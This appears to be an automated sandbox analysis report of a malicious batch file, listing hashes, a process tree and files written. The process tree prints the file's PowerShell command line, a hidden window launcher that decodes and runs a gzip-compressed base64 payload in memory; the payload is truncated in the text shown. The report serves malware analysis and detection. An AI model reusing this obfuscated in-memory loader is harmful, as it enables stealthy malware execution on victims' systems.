File name: | 123.bat |
Full analysis: | https://app.any.run/tasks/ce4ab643-fef6-4755-8234-7f1e50623ee3 |
Verdict: | Malicious activity |
Analysis date: | February 19, 2019, 07:19:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | A3FFD94D855F6330A4C94E92F2BC28BC |
SHA1: | DF69BBAE2B57EB079E0FA9EB67C5EFDD75105FC1 |
SHA256: | C1E552A0F3121C56F4B22680ADE8434E9DF36D441596AAE4FF2CB3F9F4324EE3 |
SSDEEP: | 48:dVIaWMaMUc6/2rcmilWrSsquUFlPvoRV1mSTXDjDe6:tSlIcZ/kkhg1mS7Dji6 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3116 | cmd /c ""C:\Users\admin\AppData\Local\Temp\123.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3916 | powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGI8ZlwCA7VW+4+bRhD+OZHyP6DKkkF1bLDJJRcpUvEDP874xevM1arWsMDayyOw+Gy3/d87+JFcmkubVCoy8rI7MzvzzTc76xexy0gSc4XrcL+/evlihjIUcXxl7USkxlUClsbCixewUPH25iHmPnD8g5Km3SRCJF69f98psgzH7Pxd72Om5DmO1pTgnBe4Pzg7xBl+PV1vsMu437nKb/U+TdaIXsQOHeSGmHutxF65Nk5cVLpT11NKGF/99deq8PBaWtV7HwtEc76qH3KGo7pHaVXg/hTKDY1DivmqRtwsyROf1W0St5p1M86RjydgbYc1zMLEy6sChAG/DLMii7lzQKWF8zpfheEsS1zF8zKc59Ua91DaflitfuEfLhsvipiRCNeHMcNZkuo42xEX5/UBij2KF9hfgZbOMhIHK0EAsV2yxXwlLiitcT9ihp/gxyts36vEP1UCqRnLhBrk8rlAtcQrKD6rVp/x9EQAAZ4rCQC8P1+9fPXS/8SYO/kpY2D04uE0xuAeP0tychL7wIk1ToN9EEuyA3xWjKzAwuoTuFwlvKt9W1u6ioLgYSfBzIOVEG8FGpd8VjZ3Tjn9bVp2sU9i3D3EKCLulXn8cxBjn+JTePWr2ARc4quXBex1McUBYiVmZaa/UutFhH3SbReEejhTXEhTDl5BBoUvnTmnga8OYw1HgM/5G6hX8YHv+Cp94fjhunv5DULVDkV5XuNmBRScW+N0jCj2apwS5+SypBQsOQ2rn93VCsqIi3J2NbcSLjBetuskcc6ywoWMQeiGnmKXIFoiUeMGxMPtg06C67bVZ3HoIEqhCMDSDvIAM2X8Oit5kIGHkHOhrmM2jFKKI5A4lb1KUQBFfiH6iTYowF71b+5daXzmbInDFYAnzkFydZqwGmeRjMHhUWIK/PkvWz85M0onOhm+pIC/FsVD+8BKLlcejzOv5OIFkFP4GYPQ1SyJ2ijHN/L5dOB/akxJR4FnOYyp5ra3RFIeiTTU4DVJa5h033p3o82gkXX3oa8M86E2mHXng4G8G+mWzPTekN3Nhkzr3W82ujJYmEvmDJWBQcTtUj6mI3LUx4q33Dduju3jo9jeHzeB5y+7vh+89fWF9EYlY7szb4tNNO72irHdfmyLct4jj4M5MefbkcrWS4si028E99ItIvtxtrGkZB1ZotIPW8h+k1r9UPMOy0Hj1tw3pYlhwou6qY2R35AsGAcw19y8HUKcN513bfjbOfaILSmdzM03S5ta0UIairbVO077qTm3J7J5Pzl4/XCqb1loW6Nk3VuIY0slenfONMmZLe1w49qL/sJoO8tof7M237XW2zd3uu0cTdMRnS0tjIPUNXq06agjcWFtW6aa+gtrcef1mGWarLM0w2h+dHSXqh0kTgx7oLV0ddtC1mSsW6o/6XuaE21lI7oVNclajg26N7vhYdG8PermfupulKNznCCnKTJkJ4rZD++J0+g3bu3Rnk4SpTsOQrXEwzOsaJNZuvwW1mwUpD4aKkdF6YzkftIz+4lvRaG0SG | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FZR15TQ5OQ7NCCO6XT9Y.temp | — | |
MD5:— | SHA256:— | |||
3916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20e7e3.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |